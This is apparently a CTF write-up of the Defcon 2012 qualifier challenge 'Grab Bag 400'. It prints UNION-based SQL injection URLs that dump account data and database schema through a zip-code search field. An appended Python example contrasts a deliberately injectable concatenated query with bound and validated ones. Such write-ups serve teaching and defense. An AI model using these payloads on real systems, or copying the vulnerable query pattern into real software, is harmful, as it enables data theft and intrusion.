Saturday, June 9, 2012

Defcon CTF Quals 2012: Grab Bag 400

Grab Bag 400 was a simple SQL injection vulnerability in a zip-code-based search, which we exploited using a UNION query.

The following query was executed to enumerate the accounts table:

http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=11%20UNION%20select%20CAST(id%20as%20text),CAST(id%20as%20text),CAST(id%20as%20text),CAST(account%20as%20text),balance,CAST(id%20as%20text)%20from%20Account

Since there was no name in the accounts table, we enumerated the information schema to find the names and schemas of the other tables in the database. We found that the user information is stored in the customer table, which we enumerated using:

http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=11%20UNION%20SELECT%20table_name,%20table_schema,%20column_name,%20'1',%20'1',%20'1'%20FROM%20information_schema.columns%20WHERE%20table_name%20=%20'customer'

After enumerating the contents of the Customer table, we were unable to find the name 'Jeff Moss', as was required to solve the level. Since every account's balance was 0.00, we ended up scoring using 0.00 as the key. However, we later realized we had to look for Dark Tangent, Jeff Moss' alter ego, in the customer database :)
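The root cause behind the first URL above, shown as an added example that is not code from the challenge or from this post: a zip parameter concatenated into the query, next to the bound and validated forms. SQLite stands in for the challenge database; the branch table layout, the sample rows and all function names are assumptions, and only the Account columns come from the post's query.

```python
import re
import sqlite3
from urllib.parse import unquote

# zip value from the write-up's first URL, URL-decoded as the server would see it.
PAYLOAD = unquote(
    "11%20UNION%20select%20CAST(id%20as%20text),CAST(id%20as%20text),"
    "CAST(id%20as%20text),CAST(account%20as%20text),balance,"
    "CAST(id%20as%20text)%20from%20Account"
)
COLS = "id, name, street, city, state, zip"  # assumed six-column branch result


def make_db():
    """Constructed stand-in database; only the Account columns come from the post."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE branch (id INTEGER, name TEXT, street TEXT,
                             city TEXT, state TEXT, zip INTEGER);
        CREATE TABLE account (id INTEGER, account INTEGER, balance TEXT);
        INSERT INTO branch VALUES (1, 'Downtown', '1 Main St', 'Las Vegas', 'NV', 89101);
        INSERT INTO account VALUES (7, 1234567, '0.00');
    """)
    return db


def find_branch_vulnerable(db, zip_param):
    # Parameter concatenated into the statement: UNION ... is parsed as SQL.
    return db.execute(f"SELECT {COLS} FROM branch WHERE zip = " + zip_param).fetchall()


def find_branch_bound(db, zip_param):
    # Bound parameter: the whole string is compared as a value, never parsed.
    return db.execute(f"SELECT {COLS} FROM branch WHERE zip = ?", (zip_param,)).fetchall()


def find_branch_hardened(db, zip_param):
    # Allow-list validation first, then a bound integer.
    if not re.fullmatch(r"\d{5}", zip_param):
        return []
    return find_branch_bound(db, int(zip_param))


if __name__ == "__main__":
    db = make_db()
    for fn in (find_branch_vulnerable, find_branch_bound, find_branch_hardened):
        print(fn.__name__, fn(db, PAYLOAD))
```

Only the concatenated version returns the account row; the bound and validated versions return an empty result for the same input while still serving a legitimate five-digit zip.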
